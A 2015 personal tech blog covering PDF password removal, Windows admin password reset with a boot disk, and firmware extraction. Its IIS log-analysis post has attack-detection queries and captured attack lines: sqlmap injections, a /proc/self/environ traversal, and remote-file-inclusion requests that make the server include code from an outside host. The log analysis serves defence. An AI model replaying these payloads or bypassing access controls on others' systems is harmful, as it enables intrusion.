Wednesday, January 28, 2015

Removing password from protected PDF documents

$ pdftops [your_protected_pdf_document.pdf] out.ps

$ ps2pdf [out.ps] broken_protection_pdf_document.pdf 
http://www.cyberciti.biz/faq/removing-password-from-pdf-on-linux/
Type the following command to install the qpdf: $ sudo apt-get install xpdf-utilsFirst, decrypt a PDF and create a postscript file, enter:
pdftops input.pdf out.ps
You will get input.ps file. This can be printed or open under Linux itself. But, you can convert it back .ps file (postscript)back to a PDF as follows:
ps2pdf out.ps ready.pdf
Please note that the ps2pdf command is part of ghostscript and it will get installed when you run xpdf-utils.
Now you can convert it with Nitro PDF https://www.gonitro.com/pro

Wednesday, January 21, 2015

Remove Admin Password from Win 7, 8, 2008 etc for free

http://pogostick.net/~pnh/ntpasswd/bootdisk.html

***************************************************************************
*                                                                         *
*         Windows Change Password / Registry Editor / Boot CD             *
*                                                                         *
*  (c) 1998-2014 Petter Nordahl-Hagen. Distributed under GNU GPL v2       *
*                                                                         *
* DISCLAIMER: THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTIES!          *
*             THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE       *
*             CAUSED BY THE (MIS)USE OF THIS SOFTWARE                     *
*                                                                         *
* More info at: http://pogostick.net/~pnh/ntpasswd/                       *
* Email       : pnh@pogostick.net                                         *
***************************************************************************

Just boot this CD and follow instructions.
Usually, just pressing return/enter should work, except some
drivers may have to be loaded manually with the 'm' menu option after boot.

 ---

The password reset and registry edit has now been tested with the following:

NT 3.51, NT 4, Windows 2000, Windows XP, Windows 2003 Server,
Vista, Windows 7, Server 2008, Windows 8, Windows 8.1, Server 2012

As far as I know, it will work with all Service Packs (SP) and
all editions (Professional, Server, Home etc)
Also, 64 bit windows versions shold be OK.

 ---

To make a bootable USB drive / key:

1. Copy all files from this CD onto the USB drive.
   It cannot be in a subdirectory on the drive.
   You do not need delete files already on the drive.
2. Install the bootloader
   On the USB drive, there should now be a file "syslinux.exe".
   Start a command line window (cmd.exe) with "run as administrator"
   From the command line, run the command like this:


j:\syslinux.exe -ma j:

replace j with some other letter if your USB drive is on another
drive letter than j:
On some drives, you may have to omit the -ma option if you
get an error.
If it says nothing, it probably did install the bootloader.

Please note that you may have to adjust settings in your computers BIOS
setup to boot from USB.
Also, some BIOS (often older machines) simply won't boot from USB anyway.
Unfortunately, there are extremely many different versions of BIOS,
and a lot of them are rather buggy when it comes to booting off different
media, so I am unable to help you.


Tuesday, January 13, 2015

Searching - Replacing in log files

Long time ago I found amazing tool to do such kind of tasks:

http://www.mind-pioneer.com/

Here -how to extract IP addresses from log file:

http://www.mind-pioneer.com/services/419_Text_file_parser.html


This is small list what you can do with IP addresses in  logs :

http://www.mind-pioneer.com/services/conv_search.php?key=IP+address&type=all&x=30&y=12


Monday, January 12, 2015

How to use Log Parser Lizard




A Log Parser GUI for Microsoft Log Parser http://www.lizard-labs.com/log_parser_lizard.aspx is a versatile tool that provides quick access to log files, XML files, CSV files, as well as data sources on the Microsoft Windows operating system. Now, businesses running Log Parser can use this query software to find exactly what they need exactly when they need it.




1)      Click on “IIS logs” button
2)      Click on “Attacks” link
3)      Modify line “3” with your path to your logs location. Keep format and do not forget to type \*.log’ in end of line.
4)      Click “Run Query” button

Predefined Queries


The following are a set of queries and their purpose we use to analyse the logs:

Main Query used for most Attacks:


This query covered following attacks: Directory discovery, XSS, XSF, SQL injection, Command injection. Part with PHP -  all attacks related to PHP technology. We monitoring these attacks, because hackers can develop new attack if they see that technology is different.

SELECT date AS Date, c-ip AS IP,cs-uri-stem AS URL_Address, cs-uri-query AS Attack_Details,
count(*) AS Attempts
FROM 'C:\IIS Logs\Logs\*.log'

Where (cs-uri-query LIKE '%./%') OR (cs-uri-query LIKE '%.php%') OR (cs-uri-query LIKE '%//.%')
OR (cs-uri-query LIKE '%src=http%') OR (cs-uri-query LIKE '%src=ftp%') OR (cs-uri-query LIKE '%l=ftp://%')
OR (cs-uri-query LIKE '%l=http://%') OR (cs-uri-query LIKE '%SELECT%') OR (cs-uri-stem LIKE '%.php%')

GROUP BY date, c-ip, cs-uri-stem, cs-uri-query ORDER BY date, c-ip, cs-uri-query

SQL Injection Attempts:

SELECT date AS Date, c-ip AS IP, cs-uri-query AS Query_Made, cs(User-Agent) AS Broser, count(*) AS Attempts FROM 'C:\IIS Logs\Logs\*.log' Where cs(User-Agent) LIKE '%sql%' GROUP BY date, c-ip, cs-uri-query, cs(User-Agent) ORDER BY date, c-ip, cs-uri-query

Query details:

·         (cs-uri-query LIKE '%./%') – Searching “./” pattern “%” means “ Any Symbol” – Directory discovering.
·         (cs-uri-query LIKE '%.php%') – Searching any record contain “***.php” – An any PHP related attacks.
·         (cs-uri-query LIKE '%//.%') - Searching “.//” pattern – Directory discovering.
·         (cs-uri-query LIKE '%src=http%') – XSS scripting.
·         (cs-uri-query LIKE '%src=ftp%') - XSS scripting
·         (cs-uri-query LIKE '%l=ftp://%') - XSS scripting
·         (cs-uri-query LIKE '%l=http://%') - XSS scripting
·         (cs-uri-query LIKE '%SELECT%') – SQL injection





1)      Click “Export to Excel”
2)      Chose location.
3)      Click “Save”.

After that you can perform log analyses and report.

WW3 Logs Analyses




When you looking into logs there is pattern of normal work. You can easily will find pattern if you just start going through logs. On some server patterns looks like this.

2012-08-31 00:00:13 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 200 0 0 234
2012-08-31 00:00:13 198.103.***.**POST /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 302 0 0 124
2012-08-31 00:00:13 198.103.***.**GET /error/GenericErrorPage.htm aspxerrorpath=/RIR_RDI/index_e.aspx 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 404 0 2 46
2012-08-31 00:01:38 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=452642&l=e 8080 - 59.167.198.149 Mozilla/5.0+(Windows+NT+6.0;+WOW64;+rv:14.0)+Gecko/20100101+Firefox/14.0.1 200 0 0 1060
2012-08-31 00:01:40 198.103.***.**POST /Reflex/index_f.aspx - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 608
2012-08-31 00:01:40 198.103.***.**GET /style/header.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 78
2012-08-31 00:01:40 198.103.***.**GET /style/footer.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 46
2012-08-31 00:01:40 198.103.***.**GET /style/refinfo.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 31
2012-08-31 00:01:40 198.103.***.**GET /style/common.css - 8080 - 74.14.188.98

This normal work contain Date, Time, IP of server, details of request, IP of remote host and details of application, OS which been used. 
When we scrolling logs down, we can see different types of attacks.

Sample of SQL injection attack

Performed to verify security of web site:

2012-07-18 17:29:33 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46
2012-07-18 17:29:34 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31
2012-07-18 17:29:50 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46
2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15
2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=4853 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31
2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15
2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%29%20AND%201249%3D9782%20AND%20%288697%3D8697 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15

Let’s make short analyses of this injection:

2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org)200 0 0 15


-          First RED part is injection attempt, 2nd RED part is IP address. 3D Part is details of tool.
First part is always present and this major information that SQL Injection been done.
-          2nd part is IP address. We copy this IP Address and checking where is location - http://www.iplocation.net/.
Location can help to understand if it is not internal test or VA. If location different than YOUR network, than we should start investigation if this attack penetrate our web site.
-          For investigation we using special computers with installed BackTrack distributive and with SQLMAP we trying to repeat SQL injection to see if our application or network is vulnerable to such attack.


Keep in mind that this is just sample of our attack and that some of attacks can looks different.

Provide information about other attacks and what look, difference from pattern, IP Location.

One of sample of Event logs from App logs  shows that it was some potential attack :

Exception information:     Exception type: HttpRequestValidationException    Exception message: A potentially dangerous Request.Form value was detected from the client (txtFulltext=""...jsc.djts, <a href=""http://qual...""). Request information:     Request URL: http://www.***.***:8080/RIR_RDI/index_e.aspx?n=y     Request path: /RIR_RDI/index_e.aspx     User host address: 96.47.225.66     User:      Is authenticated: False     Authentication Type:      Thread account name: IIS APPPOOL\CLFApps

You can see that Exception message shows “ Potential Danger Request…”, we can google.com it and see that it can be related to security of windows form on .NET . But we must be sure that it is not repetitive attempt penetrate web site. Unfortunately without sniffer we cannot see whole URL ( href=”http://qual... “”), therefore we need to perform cross search in other logs for same time. In this situation simple Google search shows that this IP address been reported as Spam Bot, which trying to submit messages in forms. As our web site have form, therefore Spam Bot automatically trying to submit some post there.

Sample of CSS ( Cross Site Scripting) or XSS


2012-08-16 03:40:25 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:26 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:28 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:29 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105


SQL Injection:

2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%27%60%28%5B%7B%5E%7E 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 483
2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D8 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 405
2012-09-05 18:18:46 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D3 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 499

Possibly directory enumeration attack:

2012-08-22 12:37:56 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109
2012-08-22 12:37:56 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109
2012-08-22 12:37:57 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78
2012-08-22 12:37:57 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78




Tuesday, January 6, 2015

DNS leak and why should I care?


http://ipleak.net/ 

https://www.dnsleaktest.com/ 


 When using an anonymity or privacy service, it is extremely important that all traffic originating from your computer is routed through the anonymity network. If any traffic leaks outside of the secure connection to the network, any adversary monitoring your traffic will be able to log your activity. DNS or the domain name system is used to translate domain names such as www.privacyinternational.org into numerical IP addresses e.g. 123.123.123.123 which are required to route packets of data on the Internet. Whenever your computer needs to contact a server on the Internet, such as when you enter a URL into your browser, your computer contacts a DNS server and requests the IP address. Most Internet service providers assign their customers a DNS server which they control and use for logging and recording your Internet activities. Under certain conditions, even when connected to the anonymity network, the operating system will continue to use its default DNS servers instead of the anonymous DNS servers assigned to your computer by the anonymity network. DNS leaks are a major privacy threat since the anonymity network may be providing a false sense of security while private data is leaking. If you are concerned about DNS leaks, you should also understand transparent DNS proxy technology to ensure that the solution you choose will stop DNS leak.

How to extract firmware with little – big endian.

I got the task to get as much as possible information from unknown Firmware.
The file is flash_dump.bin
Pre-analyses with WinHex or Hex readers shows nothing.
So I need to use Kali Linux… Some staff is missing on Kali Linux and I have to preinstall it.

Tools which you need to preinstall before start working with firmware:

! On my Kali version those tools are preinstalled and I do not need to install it. If you will find that you do not have this tools here is steps how to install it.
Binwalk:
Check if binwalk is latest version, in terminal windows: 

apt-get install binwalk

It shows that binwalk already latest version. You can force to install new version with this commands

Firmware-Mod-Kit
  • apt-get install git
  • apt-get install build-essential
  • apt-get install zlib
  • apt-get install zlib1g-dev
  • apt-get install liblzma-dev
  • apt-get install python-magic
  • apt-get install firmware-mod-kit  

If you need to find where it is installed, use the command:
  • find  / -name extract-firmware.sh
In my case it is installed in: /opt/firmware-mod-kit/trunk/

Now we need to transfer firmware BIN file in Kali directory. I found the glitch that my Kali VM cannot see my USB Flash drive,  and I fix it with this ( select USB 3 )

I found that the easy way to work for extracting the image to copy it in the same folder where Firmware mod kit installed

I’m using MC for this


Now we need to look inside of the image, to understand what we can get from it.
Let’s extract the readable strings with commands:

Strings flash_dump/bin >strings.txt


And
binwalk -S  flash_dump.bin > list.txt


And after looking on that files we can see some strange strings:

First highlighted word is definitely should be “unknown” and “free”.

This is happened because architecture of processors which using this BIN file is 16 bit and decompiling is 32 bit. 
You can search in internet for understanding “Little Big endian”.

Basically we need to switch each next bit with previous one: 1<>2, 3<>4, n<>(n+1)

This is can be easily done with command:

  • dd if=flash_dump.bin of=conv.bin conv=swab

it will convert “strange” bin file into conv.bin.

And now let’s run  again:

  • strings conv_dump/bin >strings_corr.txt


And
  • binwalk -S  conv_dump.bin > list_corr.txt


Now we can read it.

Let’s extract the files form the conv.bin image with command:
  • ./extract-firmware.sh conv.bin


Now you have extracted files which you can analyse and modify.

Another sample:

With different firmware – from ASUS router RT-AC68U, it is just 2 simple steps, because not confusing part with “little-big endian

Before extracting let’s verify that no little-big endian conversion required.

Take the firmware which is in the different format: RT-AC68U_3.0.0.4_374_5656-g8d0a991.trx

And run command:

  •  Strings RT-AC68U_3.0.0.4_374_5656-g8d0a991.trx > strings.txt

In the files strings.txt - let’s go in the end and we can see that all text is readable:


 You have to copy  this firmware into directory where firmware-mod-kit located and run command

  • ./extract-firmware.sh RT-AC68U_3.0.0.4_374_5656-g8d0a991.trx

Same “fmk” folder with extracted and ready for analyses files.